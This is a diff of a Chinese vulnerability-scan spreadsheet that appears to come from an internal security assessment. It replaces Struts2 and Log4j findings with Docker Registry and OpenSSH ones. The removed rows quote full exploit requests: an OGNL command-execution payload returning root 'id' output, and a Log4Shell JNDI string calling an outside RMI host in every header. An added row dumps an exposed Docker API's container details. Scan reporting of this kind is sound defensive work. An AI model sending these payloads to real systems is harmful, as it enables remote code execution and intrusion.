--- a/安全体检报告/风险清单/漏洞清单.xlsx
+++ b/安全体检报告/风险清单/漏洞清单.xlsx
@@ -423,7 +423,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:Y45"/>
+  <dimension ref="A1:Y43"/>
   <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
   <sheetData>
     <row r="1">
@@ -556,7 +556,7 @@
     <row r="2">
       <c r="A2" t="inlineStr">
         <is>
-          <t>Apache Struts2 代码执行漏洞(CVE-2017-5638)</t>
+          <t>Docker Registry API未授权访问</t>
         </is>
       </c>
       <c r="B2" t="inlineStr">
@@ -566,33 +566,24 @@
       </c>
       <c r="C2" t="inlineStr">
         <is>
-          <t>严重</t>
-        </is>
-      </c>
-      <c r="D2" t="inlineStr">
-        <is>
-          <t>命令执行</t>
-        </is>
-      </c>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D2" t="inlineStr"/>
       <c r="E2" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://cwiki.apache.org/confluence/display/WW/S2-045</t>
+          <t>Docker Registry API 配置授权访问</t>
         </is>
       </c>
       <c r="F2" t="inlineStr">
         <is>
-          <t>Apache Struts是美国阿帕奇（Apache）软件基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本中的Jakarta Multipart解析器存在安全漏洞，该漏洞源于程序没有正确处理文件上传。远程攻击者可借助带有＃cmd=字符串的特制Content-Type HTTP头利用该漏洞执行任意命令。</t>
-        </is>
-      </c>
-      <c r="G2" t="inlineStr">
-        <is>
-          <t>APT利用、有攻击代码披露、活跃漏洞、勒索利用、病毒利用、高可利用</t>
-        </is>
-      </c>
+          <t>Docker是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的容器中，然后发布到任何流行的LINUX机器上，也可以实现虚拟化。Docker swarm 是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker API，能够方便docker集群的管理和扩展，由docker官方提供。Docker  Registry API如配置不当可导致未授权访问，被攻击者恶意利用。</t>
+        </is>
+      </c>
+      <c r="G2" t="inlineStr"/>
       <c r="H2" t="inlineStr">
         <is>
-          <t>STA</t>
+          <t>SIP</t>
         </is>
       </c>
       <c r="I2" t="inlineStr">
@@ -600,24 +591,20 @@
           <t>原理扫描</t>
         </is>
       </c>
-      <c r="J2" t="inlineStr">
-        <is>
-          <t>CVE-2017-5638</t>
-        </is>
-      </c>
+      <c r="J2" t="inlineStr"/>
       <c r="K2" t="inlineStr">
         <is>
-          <t>2026-07-13 17:02</t>
+          <t>2026-07-24 17:44</t>
         </is>
       </c>
       <c r="L2" t="inlineStr">
         <is>
-          <t>2026-07-13 17:02</t>
+          <t>2026-07-22 05:17</t>
         </is>
       </c>
       <c r="M2" t="inlineStr">
         <is>
-          <t>192.168.106.130</t>
+          <t>10.50.145.10</t>
         </is>
       </c>
       <c r="N2" t="inlineStr">
@@ -644,12 +631,12 @@
       </c>
       <c r="T2" t="inlineStr">
         <is>
-          <t>80</t>
+          <t>2375</t>
         </is>
       </c>
       <c r="U2" t="inlineStr">
         <is>
-          <t>10.100.12.1:8015/doUpload.action</t>
+          <t>10.50.145.10:2375/v1.42/containers/3c4ff73735a4f56f2af80cb783d799b52a60c420fc49157cf7ee14ce36fb07ad/json</t>
         </is>
       </c>
       <c r="V2" t="inlineStr">
@@ -659,25 +646,21 @@
       </c>
       <c r="W2" t="inlineStr">
         <is>
-          <t>页面url: 10.100.12.1:8015/doUpload.action
-请求体: POST /doUpload.action HTTP/1.1
-User-Agent: python-requests/2.18.4
-Connection: keep-alive
-Accept-Encoding: deflate
-Accept: */*
-Content-Type: multipart/form-data; boundary=---------------------------WEBKIT198919991920098822555
-Content-Length: 763
-Host: 10.100.12.1:8015
------------------------------WEBKIT198919991920098822555
-Content-Disposition: form-data; name="foo"; filename="{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder({'/bin/bash','-c','id'})).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}b"
-Content-Type: text/plain
-zzzzz
------------------------------WEBKIT198919991920098822555--
-响应体: 
-HTTP/1.1 200
-Transfer-Encoding: chunked
-Date: Tue, 30 Apr 2019 05:07:52 GMT
-uid=0(root) gid=0(root) groups=0(root)</t>
+          <t xml:space="preserve">页面url: 10.50.145.10:2375/v1.42/containers/3c4ff73735a4f56f2af80cb783d799b52a60c420fc49157cf7ee14ce36fb07ad/json
+请求体: GET /v1.42/containers/3c4ff73735a4f56f2af80cb783d799b52a60c420fc49157cf7ee14ce36fb07ad/json HTTP/1.1
+Host: 10.50.145.10:2375
+User-Agent: Go-http-client/1.1
+Accept-Encoding: gzip
+响应体: HTTP/1.1 200 OK
+Api-Version: 1.44
+Content-Type: application/json
+Docker-Experimental: false
+Ostype: linux
+Server: Docker/25.0.5 (linux)
+Date: Mon, 04 Nov 2024 17:23:50 GMT
+Transfer-Encoding: chunked
+{"Id":"3c4ff73735a4f56f2af80cb783d799b52a60c420fc49157cf7ee14ce36fb07ad","Created":"2024-10-15T02:09:45.273030022Z","Path":"sh","Args":["-c","java $JAVA_OPTS -jar /rocketmq-dashboard.jar"],"State":{"Status":"running","Running":true,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":1056439,"ExitCode":0,"Error":"","StartedAt":"2024-10-15T06:56:19.236604419Z","FinishedAt":"2024-10-15T06:56:01.382194657Z"},"Image":"sha256:eae6c5db5d119ed594f0bcfe73829e4a8df128bc3ca874d8f11b4ff2cde48769","ResolvConfPath":"/var/lib/docker/containers/3c4ff73735a4f56f2af80cb783d799b52a60c420fc49157cf7ee14ce36fb07ad/resolv.conf","HostnamePath":"/var/lib/docker/containers/3c4ff73735a4f56f2af80cb783d799b52a60c420fc49157cf7ee14ce36fb07ad/hostname","HostsPath":"/var/lib/docker/containers/3c4ff73735a4f56f2af80cb783d799b52a60c420fc49157cf7ee14ce36fb07ad/hosts","LogPath":"/var/lib/docker/containers/3c4ff73735a4f56f2af80cb783d799b52a60c420fc49157cf7ee14ce36fb07ad/3c4ff73735a4f56f2af80cb783d799b52a60c420fc49157cf7ee14ce36fb07ad-json.log","Name":"/rmqdashboard","RestartCount":0,"Driver":"overlay2","Platform":"linux","MountLabel":"","ProcessLabel":"","AppArmorProfile":"","ExecIDs":null,"HostConfig":{"Binds":null,"ContainerIDFile":"","LogConfig":{"Type":"json-file","Config":{"max-file":"3","max-size":"5m"}},"NetworkMode":"rocketmq_rocketmq","PortBindings":{"8080/tcp":[{"HostIp":"","HostPort":"18080"}]},"RestartPolicy":{"Name":"on-failure","MaximumRetryCount":0},"AutoRemove":false,"VolumeDriver":"","VolumesFrom":null,"ConsoleSize":[0,0],"CapAdd":null,"CapDrop":null,"CgroupnsMode":"host","Dns":[],"DnsOptions":[],"DnsSearch":[],"ExtraHosts":[],"GroupAdd":null,"IpcMode":"private","Cgroup":"","Links":null,"OomScoreAdj":0,"PidMode":"","Privileged":false,"PublishAllPorts":false,"ReadonlyRootfs":false,"SecurityOpt":null,"UTSMode":"","UsernsMode":"","ShmSize":67108864,"Runtime":"runc","Isolation":"","CpuShares":0,"Memory":0,"NanoCpus":0,"CgroupParent":"","BlkioWeight":0,"BlkioWeightDevice":null,"BlkioDeviceReadBps":null,"BlkioDeviceWriteBps":null,"BlkioDeviceReadIOps":null,"BlkioDeviceWriteIOps":null,"CpuPeriod":0,"CpuQuota":0,"CpuRealtimePeriod":0,"CpuRealtimeRuntime":0,"CpusetCpus":"","CpusetMems":"","Devices":null,"DeviceCgroupRules":null,"DeviceRequests":null,"MemoryReservation":0,"MemorySwap":0,"MemorySwappiness":null,"OomKillDisable":false,"PidsLimit":null,"Ulimits":null,"CpuCount":0,"CpuPercent":0,"IOMaximumIOps":0,"IOMaximumBandwidth":0,"MaskedPaths":["/proc/asound","/proc/acpi","/proc/kcore","/proc/keys","/proc/latency_stats","/proc/timer_list","/proc/timer_stats","/proc/sched_debug","/proc/scsi","/sys/firmware","/sys/devices/virtual/powercap"],"ReadonlyPaths":["/proc/bus","/proc/fs","/proc/irq","/proc/sys","/proc/sysrq-trigger"]},"GraphDriver":{"Data":{"LowerDir":"/var/lib/docker/overlay2/495f837fce5e382da2ef63bbce7c541354280fd6390f4419385956a2afb68953-init/diff:/var/lib/docker/overlay2/f687ab2b410314cffb28de1f2022f3dd28e4e0709ec7ea5cd5a781579f2d7fe4/diff:/var/lib/docker/overlay2/b6df8aee1e206dba7294f89abf1cb05f5bcdf0af6b974abfa40d12e14b3b1b07/diff:/var/lib/docker/overlay2/33fee4e199bb858a59efa36423e1790a8a560e3125bf7bbc2c981b1b0903f2fa/diff:/var/lib/docker/overlay2/e08a01de3ff1d93ca92a2517b91b5e3db64b900fc79216a984ce0f98bd0df3df/diff:/var/lib/docker/overlay2/64c0add2f18af5c4d891010c979da556b711e1993a5d5b6cbc0a164e1c03db77/diff:/var/lib/docker/overlay2/0a95e8dd87d6dfa14c3b3ba7c6e46a9915a96ea072f6d7f17001bad9c0ab9e34/diff:/var/lib/docker/overlay2/83508297107c73b0bd92c4bd8ef0b5b51bd4dd3c03f5cfb158e51cea0bd5fced/diff:/var/lib/docker/overlay2/34801e8f1dd677099570f75e8d0855fb771a671ba4e4cb60743dc53e4aebdd3b/diff:/var/lib/docker/overlay2/f877fd9b8e106c29ee71c7b521ce682dd4fdc71be626a8eb1aff97514536d9c6/diff:/var/lib/docker/overlay2/c43f8a7951c5fbe2452c6701f0a5a20c70c58952b5f455fd1f232bb3eec6df26/diff","MergedDir":"/var/lib/docker/overlay2/495f837fce5e382da2ef63bbce7c541354280fd6390f4419385956a2afb68953/merged","UpperDir":"/var/lib/docker/overlay2/495f837fce5e382da2ef63bbce7c541354280fd6390f4419385956a2afb68953/diff","WorkDir":"/var/lib/docker/overlay2/495f837fce5e382da2ef63bbce7c541354280fd6390f4419385956a2afb68953/work"},"Name":"overlay2"},"Mounts":[{"Type":"volume","Name":"10eb874dedea4472a735dd702350805748da91981d73c84ec8a57037003cbff7","Source":"/var/lib/docker/volumes/10eb874dedea4472a735dd702350805748da91981d73c84ec8a57037003cbff7/_data","Destination":"/tmp","Driver":"local","Mode":"","RW":true,"Propagation":""}],"Config":{"Hostname":"3c4ff73735a4","Domainname":"","User":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"ExposedPorts":{"8080/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["JAVA_OPTS = -Drocketmq.namesrv.addr=rmqnamesrv:9876 -Dcom.rocketmq.sendMessageWithVIPChannel=false","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","LANG=C.UTF-8","JAVA_HOME=/usr/lib/jvm/java-8-openjdk-amd64","JAVA_VERSION=8u111","JAVA_DEBIAN_VERSION=8u111-b14-2~bpo8+1","CA_CERTIFICATES_JAVA_VERSION=20140324","JAVA_OPTS="],"Cmd":null,"Image":"10.50.145.3:5000/amd64/apacherocketmq/rocketmq-dashboard:1.0.0","Volumes":{"/tmp":{}},"WorkingDir":"","Entrypoint":["sh","-c","java $JAVA_OPTS -jar /rocketmq-dashboard.jar"],"OnBuild":null,"Labels":{"com.docker.compose.config-hash":"f272df9b33b6f275eb661085b3b2a1d5a2d3e45420a5763b7d219a61f3ae1473","com.docker.compose.container-number":"1","com.docker.compose.depends_on":"namesrv:service_started:false,broker:service_started:false","com.docker.compose.image":"sha256:eae6c5db5d119ed594f0bcfe73829e4a8df128bc3ca874d8f11b4ff2cde48769","com.docker.compose.oneoff":"False","com.docker.compose.project":"rocketmq","com.docker.compose.project.config_files":"/data/compose/19/docker-compose.yml","com.docker.compose.project.working_dir":"/data/compose/19","com.docker.compose.service":"dashboard","com.docker.compose.version":"2.20.2"}},"NetworkSettings":{"Bridge":"","SandboxID":"57f9e9e79ee1135544d4c691fa8c428a4e57f9f8a29c9cfbe37752a276aabb19","SandboxKey":"/var/run/docker/netns/57f9e9e79ee1","Ports":{"8080/tcp":[{"HostIp":"0.0.0.0","HostPort":"18080"},{"HostIp":"::","HostPort":"18080"}]},"HairpinMode":false,"LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null,"EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","MacAddress":"","Networks":{"rocketmq_rocketmq":{"IPAMConfig":null,"Links":null,"Aliases":["rmqdashboard","dashboard","3c4ff73735a4"],"MacAddress":"02:42:ac:16:00:02","NetworkID":"b64bcaa4a35a447aba95f78ba5974a594f059198c4274ca5e54e6a0c5e39f473","EndpointID":"67761803caa6de71ea707629a6d66b4b214f828e22fc694ce7ee673cf1f0c3a6","Gateway":"172.22.0.1","IPAddress":"172.22.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"DriverOpts":null,"DNSNames":["rmqdashboard","dashboard","3c4ff73735a4"]}}}}
+</t>
         </is>
       </c>
       <c r="X2" t="inlineStr">
@@ -694,7 +677,7 @@
     <row r="3">
       <c r="A3" t="inlineStr">
         <is>
-          <t>Apache Struts2 代码执行漏洞(CVE-2017-5638)</t>
+          <t>OpenSSH 安全漏洞(CVE-2016-1908)</t>
         </is>
       </c>
       <c r="B3" t="inlineStr">
@@ -707,60 +690,55 @@
           <t>严重</t>
         </is>
       </c>
-      <c r="D3" t="inlineStr">
-        <is>
-          <t>命令执行</t>
-        </is>
-      </c>
+      <c r="D3" t="inlineStr"/>
       <c r="E3" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://cwiki.apache.org/confluence/display/WW/S2-045</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F3" t="inlineStr">
         <is>
-          <t>Apache Struts是美国阿帕奇（Apache）软件基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本中的Jakarta Multipart解析器存在安全漏洞，该漏洞源于程序没有正确处理文件上传。远程攻击者可借助带有＃cmd=字符串的特制Content-Type HTTP头利用该漏洞执行任意命令。</t>
+          <t>OpenSSH 7.2之前的版本中的client存在安全漏洞，该漏洞源于程序没有正确的处理生成身份验证cookie失败的情况。攻击者可利用该漏洞获取信任的X11转发权限。</t>
         </is>
       </c>
       <c r="G3" t="inlineStr">
         <is>
-          <t>APT利用、有攻击代码披露、活跃漏洞、勒索利用、病毒利用、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H3" t="inlineStr">
         <is>
-          <t>STA</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I3" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J3" t="inlineStr">
         <is>
-          <t>CVE-2017-5638</t>
+          <t>CVE-2016-1908</t>
         </is>
       </c>
       <c r="K3" t="inlineStr">
         <is>
-          <t>2026-07-13 16:57</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L3" t="inlineStr">
         <is>
-          <t>2026-07-13 16:57</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M3" t="inlineStr">
         <is>
-          <t>192.168.35.73</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N3" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O3" t="inlineStr">
@@ -782,14 +760,10 @@
       </c>
       <c r="T3" t="inlineStr">
         <is>
-          <t>80</t>
-        </is>
-      </c>
-      <c r="U3" t="inlineStr">
-        <is>
-          <t>192.168.35.73:80/doUpload.action</t>
-        </is>
-      </c>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U3" t="inlineStr"/>
       <c r="V3" t="inlineStr">
         <is>
           <t>未知</t>
@@ -797,25 +771,7 @@
       </c>
       <c r="W3" t="inlineStr">
         <is>
-          <t>页面url: 192.168.35.73:80/doUpload.action
-请求体: POST /doUpload.action HTTP/1.1
-User-Agent: python-requests/2.18.4
-Connection: keep-alive
-Accept-Encoding: deflate
-Accept: */*
-Content-Type: multipart/form-data; boundary=---------------------------WEBKIT198919991920098822555
-Content-Length: 763
-Host: 10.100.12.1:8015
------------------------------WEBKIT198919991920098822555
-Content-Disposition: form-data; name="foo"; filename="{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder({'/bin/bash','-c','id'})).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}b"
-Content-Type: text/plain
-zzzzz
------------------------------WEBKIT198919991920098822555--
-响应体: 
-HTTP/1.1 200
-Transfer-Encoding: chunked
-Date: Tue, 30 Apr 2019 05:07:52 GMT
-uid=0(root) gid=0(root) groups=0(root)</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X3" t="inlineStr">
@@ -832,7 +788,7 @@
     <row r="4">
       <c r="A4" t="inlineStr">
         <is>
-          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+          <t>OpenSSH 安全漏洞(CVE-2016-20012)</t>
         </is>
       </c>
       <c r="B4" t="inlineStr">
@@ -842,64 +798,59 @@
       </c>
       <c r="C4" t="inlineStr">
         <is>
-          <t>严重</t>
-        </is>
-      </c>
-      <c r="D4" t="inlineStr">
-        <is>
-          <t>代码执行</t>
-        </is>
-      </c>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D4" t="inlineStr"/>
       <c r="E4" t="inlineStr">
         <is>
-          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
-2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+https://github.com/openssh/openssh-portable/pull/270</t>
         </is>
       </c>
       <c r="F4" t="inlineStr">
         <is>
-          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
-Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+          <t>OpenSSH 8.7之前版本存在安全漏洞，允许远程攻击者怀疑 SSH 服务器知道用户名和公钥的特定组合，以测试这种怀疑是否正确。 发生这种情况是因为仅当该组合对登录会话有效时才会发送质询。</t>
         </is>
       </c>
       <c r="G4" t="inlineStr">
         <is>
-          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H4" t="inlineStr">
         <is>
-          <t>STA</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I4" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J4" t="inlineStr">
         <is>
-          <t>CVE-2021-44228</t>
+          <t>CVE-2016-20012</t>
         </is>
       </c>
       <c r="K4" t="inlineStr">
         <is>
-          <t>2026-07-13 15:07</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L4" t="inlineStr">
         <is>
-          <t>2026-07-13 15:07</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M4" t="inlineStr">
         <is>
-          <t>192.168.50.143</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N4" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O4" t="inlineStr">
@@ -921,14 +872,10 @@
       </c>
       <c r="T4" t="inlineStr">
         <is>
-          <t>8080</t>
-        </is>
-      </c>
-      <c r="U4" t="inlineStr">
-        <is>
-          <t>192.168.50.143/</t>
-        </is>
-      </c>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U4" t="inlineStr"/>
       <c r="V4" t="inlineStr">
         <is>
           <t>未知</t>
@@ -936,48 +883,7 @@
       </c>
       <c r="W4" t="inlineStr">
         <is>
-          <t>页面url: 192.168.50.143/
-请求体: POST / HTTP/1.1
-Host: 192.168.50.98
-User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept: */*
-Connection: keep-alive
-Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Type: application/x-www-form-urlencoded
-Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Warning: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Length: 45
-${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-响应体: HTTP/1.1 400 Bad Request
-Content-Type: text/html; charset=us-ascii
-Server: Microsoft-HTTPAPI/2.0
-Date: Fri, 09 Sep 2022 01:54:21 GMT
-Connection: close
-Content-Length: 311
-&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"&gt;
-&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bad Request&lt;/TITLE&gt;
-&lt;META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"&gt;&lt;/HEAD&gt;
-&lt;BODY&gt;&lt;h2&gt;Bad Request&lt;/h2&gt;
-&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request is badly formed.&lt;/p&gt;
-&lt;/BODY&gt;&lt;/HTML&gt;</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X4" t="inlineStr">
@@ -994,7 +900,7 @@
     <row r="5">
       <c r="A5" t="inlineStr">
         <is>
-          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+          <t>OpenSSH 拒绝服务漏洞(CVE-2016-0778)</t>
         </is>
       </c>
       <c r="B5" t="inlineStr">
@@ -1004,64 +910,62 @@
       </c>
       <c r="C5" t="inlineStr">
         <is>
-          <t>严重</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D5" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>拒绝服务</t>
         </is>
       </c>
       <c r="E5" t="inlineStr">
         <is>
-          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
-2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
         </is>
       </c>
       <c r="F5" t="inlineStr">
         <is>
-          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
-Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+          <t>OpenSSH的客户端中的roaming_common.c文件中的‘roaming_read’和‘roaming_write’函数中存在安全漏洞，该漏洞源于程序启用特定的代理和转发选项时，没有正确保持连接文件描述符。远程攻击者可通过发送多个转发请求利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）</t>
         </is>
       </c>
       <c r="G5" t="inlineStr">
         <is>
-          <t>热点漏洞、勒索利用、病毒利用、活跃漏洞、APT利用、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H5" t="inlineStr">
         <is>
-          <t>STA</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I5" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J5" t="inlineStr">
         <is>
-          <t>CVE-2021-44228</t>
+          <t>CVE-2016-0778</t>
         </is>
       </c>
       <c r="K5" t="inlineStr">
         <is>
-          <t>2026-07-13 14:36</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L5" t="inlineStr">
         <is>
-          <t>2026-07-13 14:36</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M5" t="inlineStr">
         <is>
-          <t>192.168.50.76</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N5" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O5" t="inlineStr">
@@ -1083,14 +987,10 @@
       </c>
       <c r="T5" t="inlineStr">
         <is>
-          <t>8080</t>
-        </is>
-      </c>
-      <c r="U5" t="inlineStr">
-        <is>
-          <t>192.168.50.76/</t>
-        </is>
-      </c>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U5" t="inlineStr"/>
       <c r="V5" t="inlineStr">
         <is>
           <t>未知</t>
@@ -1098,48 +998,7 @@
       </c>
       <c r="W5" t="inlineStr">
         <is>
-          <t>页面url: 192.168.50.76/
-请求体: POST / HTTP/1.1
-Host: 192.168.50.98
-User-Agent: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Encoding: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept: */*
-Connection: keep-alive
-Accept-Charset: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Language: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Accept-Ranges: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cache-Control: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Cookie: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Content-Type: application/x-www-form-urlencoded
-Date: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-From: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Modified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-None-Match: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-If-Unmodified-Since: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Max-Forwards: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Pragma: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Proxy-Authorization: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Range: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Referer: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-TE: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
-Upgrade: ${jndi:rmi://10.223.2.222:1099/EOFVDhngRuFOE}
